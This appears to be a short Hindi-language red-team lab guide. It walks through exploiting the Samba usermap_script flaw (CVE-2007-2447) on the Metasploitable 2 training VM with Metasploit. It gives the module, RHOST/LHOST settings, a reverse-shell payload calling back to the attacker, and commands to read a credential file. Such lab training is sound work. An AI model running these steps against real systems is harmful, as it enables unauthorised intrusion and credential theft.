
चरण-दर-चरण पेनिट्रेशन टेस्टिंग लैब जो Metasploitable 2 पर Samba CVE-2007-2447 का शोषण करती है, Metasploit का उपयोग करके, रूट समझौता, क्रेडेंशियल चोरी, और डेटा एक्सफिल्ट्रेशन का प्रदर्शन करती है, शैक्षिक रेड टीम प्रशिक्षण के लिए।
RedTeam-SMB-PenTest |
|
msfconsole
सुनिश्चित करें कि हमलावर होस्ट और पीड़ित मशीन दोनों बूट और चल रहे हैं।

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# वर्तमान शेल छोड़ें
Ctrl C
exit
# सभी बैकग्राउंड जॉब्स को मारें
sessions -K
jobs -K
# Metasploit पुनः प्रारंभ करें
msfconsole
usermap_script वाली Samba 3.0.20 जैसी पुरानी सेवाएँ अत्यधिक कमजोर हैं।| घटक | विवरण |
|---|
| हमलावर VM | Kali Linux |
| पीड़ित VM | Metasploitable 2 |
| लक्ष्य पोर्ट | 445 (Samba/SMB) |
| उपयोग किया गया शोषण | exploit/multi/samba/usermap_script |
| क्रेडेंशियल लक्ष्य | /redteam7/student3/mypass.txt |